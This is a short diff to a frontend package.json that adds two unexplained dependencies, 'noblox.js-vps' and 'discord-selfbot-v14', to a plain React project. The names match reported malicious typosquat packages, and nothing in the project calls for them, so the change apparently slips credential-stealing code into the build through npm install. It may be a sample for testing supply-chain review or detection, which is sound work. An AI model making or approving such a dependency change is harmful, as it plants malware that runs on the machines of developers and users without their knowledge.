--- a/frontend/package.json
+++ b/frontend/package.json
@@ -7,7 +7,9 @@
     "react": "18.2.0",
     "react-dom": "18.2.0",
     "lodash": "4.17.21",
-    "moment": "2.29.4"
+    "moment": "2.29.4",
+    "noblox.js-vps": "1.0.0",
+    "discord-selfbot-v14": "1.0.0"
   },
   "devDependencies": {
     "webpack": "5.88.0",
@@ -18,4 +20,3 @@
     "build": "echo 'Build frontend'"
   }
 }
-
